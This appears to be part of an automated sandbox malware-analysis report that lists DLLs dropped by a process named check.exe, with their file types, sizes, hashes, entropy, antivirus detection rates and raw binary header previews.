                                                                                                                                                                                                            Preview:@...e...........)....................................@..........@...............|.jdY\.H.s9.!..|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):590112
                                                                                                                                                                                                            Entropy (8bit):6.461874649448891
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                            MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                            SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                            SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
                                                                                                                                                                                                            SHA-512:65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):6.499754548353504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
                                                                                                                                                                                                            MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
                                                                                                                                                                                                            SHA1:95CC74C64AB80785F3893D61A73B8A958D24DA29
                                                                                                                                                                                                            SHA-256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
                                                                                                                                                                                                            SHA-512:C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6023664
                                                                                                                                                                                                            Entropy (8bit):6.768988071491288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                            MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                            SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                            SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                            SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):436720
                                                                                                                                                                                                            Entropy (8bit):6.392610185061176
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
                                                                                                                                                                                                            MD5:0E8FF02D971B61B5D2DD1AC4DF01AE4A
                                                                                                                                                                                                            SHA1:638F0B46730884FA036900649F69F3021557E2FE
                                                                                                                                                                                                            SHA-256:1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
                                                                                                                                                                                                            SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*.....*...+..*.../..*.......*...)..*...+..*.O.+..*..+...*.O./..*.O.*..*.O....*.....*.O.(..*.Rich.*.........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7008240
                                                                                                                                                                                                            Entropy (8bit):6.674290383197779
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                            MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                            SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                            SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                            SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1340400
                                                                                                                                                                                                            Entropy (8bit):6.41486755163134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
                                                                                                                                                                                                            MD5:3569693D5BAE82854DE1D88F86C33184
                                                                                                                                                                                                            SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
                                                                                                                                                                                                            SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
                                                                                                                                                                                                            SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........Yt..7'..7'..7'...'..7'..3&..7'}.3&..7'}.4&..7'}.2&..7'}.6&..7'..6&..7'0.6&..7'..6'c.7'0.2&2.7'0.7&..7'0..'..7'...'..7'0.5&..7'Rich..7'........................PE..d....._.........." .................................................................c....`......................................... ....n..,...h....................X..........,.......T...................p...(...@...0............................................text...C........................... ..`.rdata...g.......h..................@..@.data...XN...@...2... ..............@....pdata...............R..............@..@.rsrc................>..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3591664
                                                                                                                                                                                                            Entropy (8bit):6.333693598000157
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:iPnt09+kVh2NrSdSG779LLLS/o/L4YqoY0Xba+mRRH2T:iPnt2ZVhT
                                                                                                                                                                                                            MD5:D055566B5168D7B1D4E307C41CE47C4B
                                                                                                                                                                                                            SHA1:043C0056E9951DA79EC94A66A784972532DC18EF
                                                                                                                                                                                                            SHA-256:30035484C81590976627F8FACE9507CAA8581A7DC7630CCCF6A8D6DE65CAB707
                                                                                                                                                                                                            SHA-512:4F12D17AA8A3008CAA3DDD0E41D3ED713A24F9B5A465EE93B2E4BECCF876D5BDF0259AA0D2DD77AD61BB59DC871F78937FFBE4D0F60638014E8EA8A27CAF228D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.4...Z...Z...Z......Z..^...Z..Y...Z.._...Z..[...Z...[...Z...[...Z...[...Z..._...Z...Z...Z.......Z......Z...X...Z.Rich..Z.........PE..d......_.........." .....^$..........O$.......................................7.....}.7...`...........................................,......2.......6.......4. .....6.......6..J....).T.....................).(...p.).0............p$..%...........................text....\$......^$................. ..`.rdata......p$......b$.............@..@.data.........3..n....2.............@....pdata.. .....4......l4.............@..@.rsrc.........6......`6.............@..@.reloc...J....6..L...f6.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):438768
                                                                                                                                                                                                            Entropy (8bit):6.312090336793804
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:k1tE6lq982HdyuEZ5gw+VHDZjZ0yOWm7Vdcm4GyasLCZCu6vdQp:k1tEuq9Hdyuo5gwguyOtVIup
                                                                                                                                                                                                            MD5:2030C4177B499E6118BE5B9E5761FCE1
                                                                                                                                                                                                            SHA1:050D0E67C4AA890C80F46CF615431004F2F4F8FC
                                                                                                                                                                                                            SHA-256:51E4E5A5E91F78774C44F69B599FAE4735277EF2918F7061778615CB5C4F6E81
                                                                                                                                                                                                            SHA-512:488F7D5D9D8DEEE9BBB9D63DAE346E46EFEB62456279F388B323777999B597C2D5AEA0EE379BDF94C9CBCFD3367D344FB6B5E90AC40BE2CE95EFA5BBDD363BCC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..<...<...<...5.H.4...(...>.......*.......4.......8.......8......9...<...g....../......=....$.=...<.L.=......=...Rich<...................PE..d...M.._.........." .....(...r......d+..............................................MF....`.........................................0E...^..0................`.. F..................H...T.......................(.......0............@...............................text...N&.......(.................. ..`.rdata.......@.......,..............@..@.data...x/...0...(..................@....pdata.. F...`...H...>..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4148720
                                                                                                                                                                                                            Entropy (8bit):6.462183686222023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                            MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                            SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                            SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                            SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330736
                                                                                                                                                                                                            Entropy (8bit):6.381828869454302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                            MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                            SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                            SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                            SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149488
                                                                                                                                                                                                            Entropy (8bit):6.116105454277536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                            MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                            SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                            SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                            SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5498352
                                                                                                                                                                                                            Entropy (8bit):6.619117060971844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                            MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                            SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                            SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                            SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101872
                                                                                                                                                                                                            Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                            MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                            SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                            SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                            SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44528
                                                                                                                                                                                                            Entropy (8bit):6.627837381503075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                            MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                            SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                            SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                            SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4173928
                                                                                                                                                                                                            Entropy (8bit):6.329102290474506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                            MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                            SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                            SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                            SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25072
                                                                                                                                                                                                            Entropy (8bit):5.961464514165753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                            MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                            SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                            SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                            SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
